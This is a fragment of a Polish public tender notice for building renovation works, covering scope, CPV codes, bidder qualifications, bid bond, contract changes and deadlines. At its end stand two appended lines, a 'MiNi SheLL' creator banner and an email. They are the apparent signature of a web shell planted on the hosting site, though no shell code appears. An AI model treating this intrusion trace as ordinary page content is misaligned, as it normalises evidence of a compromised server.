zaprawą<br/>cementową i polować farbą akrylową w kolorze grafitowym (RAL 7019).<br/>8. TARCZE ZEGAROWE: Zakres prac obejmuje demontaż istniejących tarcz zegarowych o średnicy<br/>220cm. Metalowe środki tarcz, należy pozostawić, powierzchnie stalowe oczyścić, zagruntować oraz<br/>pomalować farbą olejną grafitową (RAL 7016).<br/>9. PARAPETY CEGLANE – ZEWNĘTRZNE: Zakres prac obejmuje oczyszczenie parapetów<br/>z luźnych fug, uzupełnienie ubytków oraz zabezpieczenie powierzchni zaprawą hydrofobową.<br/>10. PODEST TECHNICZNY Z KRATY WEMA: Zakres prac obejmuje demontaż istniejącego<br/>podestu wykonanego z krat WEMA, konserwację istniejących profili stalowych z ceowników 100 oraz<br/>montaż nowego podestu stalowego z krat WEMA.<br/>11. PARAPETY WEWNĘTRZNE: Zakres prac obejmuje demontaż istniejących drewnianych<br/>parapetów wewnętrznych wraz z oczyszczeniem powierzchni i uzupełnieniem ubytków oraz montaż<br/>nowych parapetów z PCV o szerokości 35 cm ( kolor do uzgodnienia z Inwestorem).<br/>12. UZUPEŁNIENIE UBYTKÓW BETONU NA STROPACH: Zakres prac obejmuje oczyszczenie<br/>powierzchni betonu, zabezpieczenie antykorozyjne odkrytych prętów zbrojenia, wykonanie warstwy wyprofilowanie powierzchni betonowej z użyciem gotowych zapraw wg wybranego systemu naprawy<br/>( np. w technologii Sika ) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45312310-3 - Ochrona odgromowa</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45421132-8 - Instalowanie okien</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-12</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena 100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa:<br/>- w przypadku składania oferty na CZĘŚĆ nr I – Wykonawca musi wykazać, że w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wykonał należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo<br/>ukończył:<br/>1) minimum dwie roboty budowlane (umowy/zadania) obejmujące swoim zakresem<br/>remont/budowę/przebudowę/rozbudowę budynku o wartości 500 000 zł. brutto<br/>każda robota (umowa/zadanie) – z potwierdzeniem należytego wykonania.<br/>2) wykazywane roboty budowlane (każda z nich) winny obejmować swoim zakresem<br/>jednocześnie: a) roboty ogólnobudowlane, b) roboty branży elektrycznej;<br/>- w przypadku składania oferty na CZĘŚĆ nr II – Wykonawca musi wykazać, że w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wykonał należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo<br/>ukończył:<br/>1) minimum dwie roboty budowlane (umowy/zadania) obejmujące swoim zakresem<br/>remont/budowę/przebudowę/rozbudowę budynku o wartości 250 000 zł. brutto<br/>każda robota (umowa/zadanie) – z potwierdzeniem należytego wykonania.<br/>2) wykazywane roboty budowlane (każda z nich) winny obejmować swoim zakresem<br/>jednocześnie: a) roboty ogólnobudowlane, b) roboty branży elektrycznej.<br/>W przypadku jednoczesnego składania oferty na dwie części zamówienia dopuszcza się<br/>wykazywanie tego samego doświadczenia na potwierdzenie spełnienia warunków w obu<br/>częściach.<br/>Uwaga: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>spełnianie warunku Wykonawcy wykazują łącznie - Zamawiający nie formułuje w tym zakresie<br/>szczególnego sposobu spełnienia warunku o którym mowa w art. 117 ust. 1 ustawy, tym samym<br/>dopuszcza możliwość wykazywania jednej roboty przez jednego z wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, a drugiej przez inny podmiot, wykonawcę.<br/>Uwaga: Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót wykonywanych<br/>wspólnie z innymi wykonawcami, należy wykazać robotę (zakres), w której Wykonawca<br/>bezpośrednio uczestniczył. Do przeliczenia wszystkich wartości finansowych, a występujących w<br/>innych walutach niż PLN Wykonawca zastosuje średni kurs Narodowego Banku Polskiego (NBP)<br/>opublikowany w dniu ukazania się ogłoszenia o niniejszym zamówieniu na stronie internetowej<br/>prowadzonego postepowania. Średnie kursy walut dostępne są na stronie internetowej Narodowego<br/>Banku Polskiego pod następującym adresem: http://www.nbp.pl/.<br/>Dotyczy części nr I i II: Wykonawca wskaże osoby do wykonania niniejszego zamówienia wraz<br/>z informacjami na temat ich wykształcenia, kwalifikacji zawodowych, doświadczenia, a także<br/>zakresu wykonywanych przez nią czynności, które spełniają następujące warunki:<br/>1) jedną osobę, która będzie pełniła funkcję Kierownika robót branży budowalnej<br/>posiadająca uprawnienia do sprawowania samodzielnych funkcji technicznych w<br/>budownictwie<br/>do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej,<br/>2) jedną osobę, która będzie pełniła funkcję Kierownika robót branży elektrycznej<br/>posiadającą uprawnienia do sprawowania samodzielnych funkcji technicznych w<br/>budownictwie do kierowania robotami budowlanymi w specjalności instalacyjnej w<br/>zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/>Zamawiający dopuszcza możliwość łączenia funkcji pośród wskazanych wyżej, pod<br/>warunkiem spełnienia powyższych warunków przez wykazaną osobę. Dopuszcza się także<br/>wykazanie tych samych osób w obu częściach zamówienia – na wypadek realizacji obu zakresów zamówienia równolegle.<br/>Wskazane wyżej uprawnienia budowlane powinny być wydane na podstawie:<br/>- Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019r. w sprawie<br/>przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie (Dz. U. z 2019r. poz. 831), lub<br/>- odpowiadające im ważne uprawnienia w zakresie odpowiadającym powyższym<br/>wymaganiom, wydane na podstawie wcześniej obowiązujących przepisów<br/>Ilekroć powyżej mowa jest o uprawnieniach, to w przypadku osób będących obywatelami krajów<br/>członkowskich Unii Europejskich oznacza to decyzję w sprawie uznania wymaganych kwalifikacji<br/>do wykonywania w Rzeczypospolitej Polskiej samodzielnych funkcji technicznych w<br/>budownictwie w zakresie przedmiotu niniejszego zamówienia – zgodnie z właściwymi przepisami,<br/>w szczególności: z ustawą o zasadach uznania kwalifikacji zawodowych nabytych w krajach<br/>członkowskich Unii Europejskiej z dnia 22 grudnia 2015r. (tekst jednolity Dz. U. z 2020r., poz. 220<br/>ze zm.) oraz Ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów<br/>budownictwa (tekst jednolity Dz. U. z 2019 roku, poz. 1117 ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami– w zakresie niezbędnym do<br/>wykazania spełnienia warunku udziału w postępowaniu (wzór stanowi załącznik nr 4 do SWZ);<br/>2) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty – w zakresie niezbędnym do wykazania spełnienia warunku udziału w postępowaniu (wzór stanowi<br/>załącznik nr 5 do SWZ);</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> PKT 15 SWZ: WYMAGANIA DOTYCZĄCE WADIUM<br/>15.1. Oferta musi być zabezpieczona wadium w wysokości:<br/>- w przypadku składania oferty na część I - 8 000,00 PLN (słownie: osiem tysięcy zł 00/100).<br/>- w przypadku składania oferty na część II - 4 000,00 PLN (słownie: cztery tysiące zł 00/100).<br/>15.2. Wadium należy wnieść przed upływem terminu składania ofert.<br/>15.3. Za termin wniesienia wadium w pieniądzu zostanie przyjęty termin uznania rachunku<br/>Zamawiającego.<br/>15.4. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu: przelewem na rachunek bankowy Zamawiającego: 55 1020 3668 0000 5602 0302<br/>6929;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia<br/>9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019r.<br/>poz. 310, 836 i 1572).<br/>15.5. Wadium wnoszone w formie innej niż w pieniądzu musi spełniać wymagania wynikające z<br/>ustawy Pzp, w szczególności określać bezwarunkowy, nieodwołalny obowiązek zapłaty na pierwsze<br/>żądanie Zamawiającego, w przypadkach określonych w ustawie Pzp oraz być ważne przez okres<br/>związania ofertą, określony w niniejszej SWZ. Musi być wykonalne na terytorium Rzeczypospolitej<br/>Polskiej.<br/>15.6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, wykonawca przekazuje<br/>zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>15.7. Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia<br/>wystąpienia jednej z okoliczności:<br/>1) upływu terminu związania ofertą;<br/>2) zawarcia umowy w sprawie zamówienia publicznego;<br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało<br/>rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>15.8. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku<br/>zwraca wadium wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert;<br/>2) którego oferta została odrzucona;<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako<br/>najkorzystniejsza;<br/>4) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność<br/>unieważnienia albo nie upłynął termin do jego wniesienia.<br/>15.9. Złożenie wniosku o zwrot wadium, o którym mowa w pkt 15.8, powoduje rozwiązanie<br/>stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale IX ustawy Pzp.<br/>15.10. Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w<br/>formie gwarancji lub poręczenia występuje odpowiednio do gwaranta lub poręczyciela z żądaniem<br/>zapłaty wadium w okolicznościach wskazanych w art. 98 ust. 6 ustawy Pzp <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> PKT 7 SWZ - WYKONAWCY WSPÓLNIE UBIEGAJĄCY SIĘ O UDZIELENIE ZAMÓWIENIA.<br/>7.1 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają Pełnomocnika do reprezentowania ich w<br/>niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia Umowy. Umocowanie musi wynikać z treści<br/>pełnomocnictwa przedłożonego wraz z ofertą.<br/>7.2 Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został<br/>sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, zostanie spełniony, jeżeli co najmniej jeden z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej i zrealizuje roboty, dostawy lub usługi do których realizacji te uprawnienia są<br/>wymagane.<br/>7.3 W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia (o ile zostały<br/>sformułowane) wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>wykonawców, którzy wykonają roboty budowlane lub usługi do realizacji których te zdolności są wymagane.<br/>7.4 W przypadku, o którym mowa w pkt 7.2 i 7.3, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają<br/>odpowiednio do oferty oświadczenie, z którego wynika, które usługi, roboty wykonają poszczególni wykonawcy.<br/>7.5 Pełnomocnictwo powinno jednoznacznie określać postępowanie, do którego się odnosi i precyzować zakres<br/>umocowania. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>7.6 Oświadczenie o niepodleganiu wykluczeniu, spełnieniu warunków udziału w postępowaniu (art. 125 ust. 1) składa każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Dokument ten potwierdza spełnienie warunków udziału w<br/>postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnienie<br/>warunków udziału w postępowaniu oraz brak podstaw do wykluczenia.<br/>7.7 Każdy z Wykonawców wspólnie ubiegających się udzielenie zamówienia musi wykazać, że nie podlega wykluczeniu z<br/>postępowania, dlatego dokumenty i oświadczenia składane na potwierdzenie braku podstaw do wykluczenia składają każdy<br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy).<br/>7.8 W przypadku wykonawców wspólnie ubiegających się o zamówienie, których oferta zostanie uznana za<br/>najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani do zawarcia umowy cywilnoprawnej<br/>określającą rolę i zadania poszczególnych Wykonawców oraz zasady ich współdziałania podczas realizacji zamówienia.<br/>Zamawiający może żądać przedstawienia wyżej wskazanej umowy.<br/>7.9 Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy i<br/>wniesienie zabezpieczenia należytego wykonania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> PPU §15. ZMIANY UMOWY<br/>1. Zmiany niniejszej umowy dopuszczalne są w przypadkach wskazanych w art. 455 ust. 1 pkt 2-4 oraz ust. 2-4 Pzp.<br/>2. Zgodnie z art. 455 ust. 1 pkt 1 Pzp ZAMAWIAJĄCY dopuszcza możliwość zmiany niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru WYKONAWCY, w zakresie:<br/>1) zmniejszenia lub zwiększenia zakresu robót objętych umową oraz związanej z tym konieczności zmiany wysokości wynagrodzenia.<br/>2) wykonania tzw. robót zamiennych oraz związanej z tym konieczności zmiany wysokości wynagrodzenia;<br/>3) zmiany któregokolwiek z terminów wskazanych w umowie;<br/>4) zmiany wysokości wynagrodzenia.<br/>3. Zmiana, o której mowa w ust. 2 pkt 1, może nastąpić w przypadku zaistnienia okoliczności, których nie można było przewidzieć przed zawarciem umowy. W tym przypadku rozliczenie zmiany zakresu<br/>zamówienia nastąpi na podstawie minimalnych ogólnokrajowych czynników cenotwórczych w zakresie kosztów ogólnych, zysku i kosztów zakupu w danej kategorii rodzaju robót oraz na podstawie<br/>minimalnych regionalnych czynników cenotwórczych w zakresie stawki roboczogodziny. Ceny materiałów oraz sprzętu będą przyjmowane na podstawie minimalnych cen ogólnokrajowych<br/>publikowanych przez SEKOCENBUD. Czynniki cenotwórcze jak i ceny sprzętu i materiałów będą przyjmowane z kwartału poprzedzającego wykonanie robót. Podstawą do zmniejszenia lub zwiększenia zakresu robót objętych umową jest protokół konieczności, podpisany przez kierownika robót i inspektora<br/>nadzoru inwestorskiego oraz zatwierdzony przez osobę upoważnioną ze strony Zamawiającego.<br/>4. Zmiana, o której mowa w ust. 2 pkt 2, może nastąpić jedynie w przypadku zaistnienia obiektywnych okoliczności związanych z realizacją przedmiotu zamówienia oraz wyrażenia zgody przez Zamawiającego na wykonanie robót zamiennych. Rozliczenie robót zamiennych (kosztorys różnicowy)<br/>nastąpi na podstawie minimalnych ogólnokrajowych czynników cenotwórczych w zakresie kosztów ogólnych, zysku i kosztów zakupu w danej kategorii rodzaju robót oraz na podstawie minimalnych regionalnych czynników cenotwórczych w zakresie stawki roboczogodziny. Ceny materiałów oraz sprzętu<br/>będą przyjmowane na podstawie minimalnych cen ogólnokrajowych publikowanych przez SEKOCENBUD. Czynniki cenotwórcze jak i ceny sprzętu i materiałów będą przyjmowane z kwartału<br/>poprzedzającego wykonanie robót. Podstawą do zlecenia wykonania robót zamiennych jest protokół konieczności wykonania tychże robót, podpisany przez kierownika robót i inspektora nadzoru inwestorskiego oraz zatwierdzony przez osobę upoważnioną ze strony Zamawiającego.<br/>5. Zmiana terminów wskazanych w umowie może nastąpić w przypadku:<br/>1) wystąpienia okoliczności lub zdarzeń uniemożliwiających realizację w wyznaczonym terminie przedmiotu zamówienia bez usunięcia bądź likwidacji powyższych okoliczności lub zdarzeń niezależnych od stron umowy, których wystąpienia nie można było przewidzieć w dniu zawarcia umowy. Warunkiem zmiany terminu umownego realizacji przedmiotu zamówienia w ww. przypadku<br/>jest pisemne stwierdzenie przez Zamawiającego konieczności zmiany terminu umownego; 2) wystąpienia siły wyższej (powódź, huragan, katastrofa budowlana, deszcz nawalny, pożar, uderzenie pioruna, zapadanie lub osuwanie się ziemi, zalanie, uderzenie pojazdu), klęski żywiołowej lub warunków pogodowych niepozwalających na zachowanie parametrów technologicznych lub jakościowych realizowanych robót. Podstawą żądania przedłużenia terminu umownego jest przerwanie robót przez Zamawiającego, potwierdzone wpisem do Dziennika Budowy. 3) zmiany zakresu umowy (...) dalej patrz par. 15 PPU <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-24 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-1bcc90fb-d9c9-49cc-b530-6f974780e03b</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-24 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> UWAGA (dot. cz. I oraz cz. II):<br/>1) Na Wykonawcy ciąży dodatkowy obowiązek zachowania zasad wymaganych<br/>przy pracy w obiekcie czynnym, który nakazuje prowadzenie robót<br/>po uprzednim uzgodnieniu i zatwierdzeniu przez Użytkownika.<br/>2) Zamawiający wymagał będzie od Wykonawcy wyłonionego w niniejszym<br/>postępowaniu, aby realizacja robót budowlanych prowadzona była w systemie<br/>co najmniej dwuzmianowym. Zamawiający umożliwia i zaleca Wykonawcy dokonanie wizji lokalnej. Przedmiary robót należy traktować wyłącznie jako elementy pomocnicze przy sporządzaniu oferty. Wykonawca zobowiązany jest w pierwszej kolejności sporządzać ofertę w oparciu o zakres robót wyszczególniony w niniejszej SWZ oraz wskazany w załącznikach zamieszonych na stronie www postępowania<br/><br/>Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę w przypadkach, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. 2022 poz. 835). Do Wykonawcy podlegającego wykluczeniu w tym zakresie, stosuje się art. 7 ust. 3 ww. ustawy.<br/> <br/>Okres gwarancji na roboty budowlane: 60 miesięcy licząc od daty odbioru końcowego. Okres rękojmi za wady wynosi 5 lat licząc od dnia wykonania zamówienia i uznania przez zamawiającego za należycie wykonane (protokół odbioru końcowego).

Creat By MiNi SheLL
Email: jattceo@gmail.com